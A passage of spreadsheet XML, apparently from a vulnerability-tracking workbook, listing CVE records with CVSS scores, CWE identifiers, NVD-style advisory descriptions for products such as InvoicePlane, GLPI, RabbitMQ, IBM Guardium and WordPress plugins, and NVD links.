          <t>Esri LERC is an open-source image or raster format which supports rapid encoding and decoding for any pixel type. A Heap based Out-of-Bounds Write via Integer Overflow in LERC versions 4.1.0 and earlier may allow a remote, unauthenticated attacker who can pass specifically crafted attacker controlled imagery to an application that uses LERC to crash the application, leading to a denial of service.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10758</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13456</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>php, go, gin, hp</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.9.8 via the 'page' parameter parameter. This makes it possible for authenticated attackers, with subscriber-level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t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13456</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49850</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Invoices::delete() and Invoices::delete_invoice_tax() as state-changing routes without requiring POST and validating a CSRF token. When an authenticated administrator loads attacker-controlled content that requests an affected route, the application can delete an invoice or invoice tax record. The cross-origin action can remove financial data without the administrator's intent. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49850</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50547</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Invoices::generate_xml() method appends a database-derived xml_id to the XMLconfigs helper directory and includes the resulting PHP path without validating the identifier. A low-privileged attacker who can influence the e-invoice configuration can use traversal sequences to include an existing PHP file. The standalone advisory establishes local file inclusion; code execution requires a separate file-upload or file-write primitive. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50547</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52622</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>An issue in Wellav Technologies Co., Ltd Wellav WES Emergency Broadcast Terminal WES100, WES270, WES280, and WES290 before 08-08-2023 allows a remote attacker to obtain sensitive information via the global API request wrapper function</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52622</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5267</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Ciena Navigator Network
Control Suite (NCS) contains an information exposure vulnerability in an
event-streaming API that does not properly enforce authentication. An
unauthenticated attacker with network access to the affected service could
access the event stream and potentially obtain sensitive information.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5267</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53610</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, an attacker can craft a URL for a dashboard that reflects attacker-controlled markup without sufficient output encoding. A user who opens the crafted URL triggers reflected cross-site scripting in the dashboard. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53610</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53625</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.70 until 10.0.26 and 11.0.8, a technician can manipulate the authtype value through the API to change another user's authentication method. Under configurations using the legacy API REST interface or SSO logins, this can change a super-administrator's authentication method and enable account takeover. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53625</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57443</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>pip:scbe-aethermoore</t>
        </is>
      </c>
      <c r="M142" s="5" t="inlineStr">
        <is>
          <t>4.2.1</t>
        </is>
      </c>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>SCBE-AETHE</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57443</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67237</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, set_token_auth/2 inserted a bearer token from the Authorization header or access_token cookie into OAuth bootstrap JavaScript without escaping, allowing attacker-controlled token content to execute JavaScript in the management UI origin. The endpoint is exposed before authentication only when management.oauth_enabled is true, and exploitation through the cookie path additionally requires the attacker to plant an access_token cookie on the management host. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67237</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84882</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to path traversal in the Universal Connector Oracle Wallet upload component. An authenticated remote attacker could exploit this vulnerability to write arbitrary files to the system.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84882</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84884</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 stores internal REST service-account passwords in a reversible plaintext-equivalent format. An authenticated attacker who gains access to the stored credential could recover the password and obtain an administrative REST access token.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84884</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85029</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 could allow a remote attacker to obtain sensitive information, delete arbitrary files, or execute arbitrary code due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85029</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88003</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>requests, gin, rust</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane fails to revoke administrative privileges after a role downgrade because Admin_Controller trusts the user_type snapshot stored in an existing session instead of revalidating ip_users.user_type. When one administrator downgrades another account, the target's active session continues to authorize administrative requests. The downgraded user can use Users::form() to set user_type back to 1, restoring the database role and making the privilege escalation persistent. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88003</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88421</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the BlogPage.get_entries() component of APSL puput v1.2.1 through v2.2.0 allows unauthenticated attackers to view restricted blog entries via the blog index, the tag, category, author and date archives, the sidebar widgets, or the RSS feed.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88421</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89406</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to unauthorized disclosure of private gallery contents in versions up to, and including, 3.0.1. This is due to the Modula_Meta::add_metas() function being hooked to wp_head on every frontend request and looking up any post via get_post( $_GET['modula_gallery_id'] ) without verifying the gallery's post_status or the requester's capability to read it — the gallery-side input guard is bugged (empty('modula_gallery_id') tests a nonempty string literal instead of the GET parameter, so it is always false), the only object validation is a post_type === 'modula-gallery' check, and no is_user_logged_in()/current_user_can('read_post', $gallery_id) check is performed. This makes it possible for unauthenticated attackers to enumerate private modula-gallery posts and their member attachments and recover the image's title, description, dimensions, and original upload URL via Open Graph/Twitter meta tags emitted in the response, which then allows direct unauthenticated download of the original private image bytes.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89406</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91765</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
